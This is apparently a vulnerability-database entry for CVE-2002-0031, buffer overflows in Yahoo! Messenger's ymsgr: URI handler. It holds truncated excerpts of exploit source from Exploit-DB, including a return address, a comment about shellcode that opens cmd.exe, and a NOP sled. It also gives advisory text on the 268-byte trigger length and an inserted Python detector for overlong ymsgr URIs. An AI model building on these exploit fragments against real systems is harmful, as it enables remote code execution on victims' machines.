CVE-2002-0031
Published 2002-07-26
Priority: P428, medium
CVSS 2.0: 4.6 (AV:L/AC:L/Au:N/C:P/I:P/A:P)
EXPLOIT
EPSS: 4.94% (91.1th percentile)
Buffer overflows in Yahoo! Messenger 5,0,0,1064 and earlier allow remote attackers to execute arbitrary code via a ymsgr URI with long arguments to (1) call, (2) sendim, (3) getimv, (4) chat, (5) addview, or (6) addfriend.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| yahoo | messenger | — | — |
No detection rules found.
Exploit-DB
Yahoo Messenger 5.5 - 'DSR-ducky.c' Remote Overflow
exploitdb·2003-06-23
---
/*
*
* ---[ Remote yahoo Messenger V5.5 exploiter on Windows XP ]---
*
* Dtors Security Research (DSR)
* Code by: Rave
*
* The buffer looks like this
*
* |-
* ^__________^
*
*
*/
#include
#include
#include
#include
#include /* These are the usual header files */
#include
#include
#include
#define MAXDATASIZE 555 /* Max number of bytes of data */
#define BACKLOG 200 /* Number of allowed connections */
static int port =80;
/* library entry inside msvcrt.dll to jmp 0xc (EB0C); */
char sraddress[8]="\x16\xd8\xE8\x77";
/* This shellcode just executes cmd.exe nothing special here..
* the victim gets a cmd shell on his desktop :) lol ! \
*/
unsigned char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
Exploit-DB
Yahoo! Messenger 5.0 - Call Center Buffer Overflow
exploitdb·2002-05-27
---
// source: https://www.securityfocus.com/bid/4837/info
Yahoo! Messenger configures the 'ymsgr:' URI handler when it is installed. The handler invokes YPAGER.EXE with the supplied parameters. YPAGER.EXE accepts the 'call' argument; it is used for starting the 'Call Center' feature.
There is a stack overrun condition in the 'Call Center' component that may be exploited through a specially constructed URI. It has been reported that the stack frame of the affected function will be corrupted if the argument to the 'call' parameter passed to YPAGER.EXE is of 268 bytes or greater in length.
Attackers may exploit this vulnerability to execute arbitrary code.
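A defensive check for the condition described above, as an added example that is not part of the advisory or the Exploit-DB entry: it scans text such as HTML, mail bodies or proxy logs for ymsgr: URIs whose argument to one of the six commands in the CVE description reaches 268 bytes. The `ymsgr:<command>?<argument>` shape, the reuse of the 'call' threshold for the other five commands, the function and field names, and all sample input are assumptions of this example.

```python
import re
from urllib.parse import unquote_to_bytes

# The six ymsgr commands named in the CVE-2002-0031 description.
COMMANDS = {"call", "sendim", "getimv", "chat", "addview", "addfriend"}

# 268 bytes is the length reported for the 'call' argument; reusing it for
# the other five commands is an assumption of this example.
LIMIT = 268

# Assumed URI shape: ymsgr:<command>?<argument>, with the argument ending at
# whitespace, a quote or an angle bracket (usual delimiters in HTML and logs).
YMSGR_RE = re.compile(r"ymsgr:([a-z]+)\?([^\s\"'<>]*)", re.IGNORECASE)


def scan(text, limit=LIMIT):
    """Return a finding for each ymsgr URI whose argument reaches `limit` bytes."""
    findings = []
    for match in YMSGR_RE.finditer(text):
        command, raw = match.group(1).lower(), match.group(2)
        if command not in COMMANDS:
            continue
        raw_len = len(raw.encode("utf-8"))
        # Percent-encoding only lengthens a string, so the raw length is the
        # upper bound on what the handler receives; the decoded length is
        # reported as well to show how much of the argument is encoding.
        decoded_len = len(unquote_to_bytes(raw))
        if raw_len >= limit:
            findings.append({"command": command, "raw_len": raw_len,
                             "decoded_len": decoded_len, "offset": match.start()})
    return findings


# Constructed sample input (not taken from any real page or capture).
SAMPLE = "\n".join([
    '<a href="ymsgr:sendim?alice">message me</a>',            # short: ignored
    '<a href="ymsgr:call?' + "A" * 300 + '">call</a>',         # 300 bytes: flagged
    '<a href="YMSGR:AddFriend?' + "%41" * 100 + '">add</a>',   # 300 raw, 100 decoded
    '<a href="ymsgr:call?' + "B" * 267 + '">call</a>',         # one byte under limit
    '<a href="ymsgr:unknown?' + "C" * 400 + '">x</a>',         # not a listed command
])

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```
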
/* Yahpoo.c by [email protected] [www.dtors.net] [DSR]
*
* Why Yahoo Messenger have
No writeups or analysis indexed.
http://online.securityfocus.com/archive/1/274223
http://www.cert.org/advisories/CA-2002-16.html
http://www.kb.cert.org/vuls/id/137115
http://www.securityfocus.com/bid/4837